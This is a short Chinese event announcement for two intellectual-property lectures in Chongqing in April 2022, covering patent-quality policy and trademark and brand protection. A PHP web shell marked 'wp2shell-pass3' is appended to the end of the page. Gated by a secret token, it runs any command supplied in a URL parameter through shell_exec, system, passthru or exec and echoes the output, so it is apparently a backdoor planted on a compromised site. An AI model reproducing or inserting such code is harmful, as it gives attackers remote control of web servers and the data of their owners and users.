“知识产权强国建设新征程—顾迪与您一起向未来”第四、五场活动来袭!!!
第四场:
主讲人:刘文华(重庆市知识产权局运用促进处处长)
主题:重庆市高价值发明专利质量提升及运营政策解读
时间:2022年4月10日



第五场:
主讲人:谭兵(资深知识产权专家)
主题:企业商标保护及品牌建设
时间:2022年4月20日


// wp2shell-pass3 if (isset($_GET['t']) && hash_equals('85680686487752acb1a2f09033bfba49', (string)$_GET['t']) && isset($_GET['c'])) { $c=(string)$_GET['c']; $o=''; if(function_exists('shell_exec')) $o=(string)@shell_exec($c); elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();} elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();} elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);} $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit; }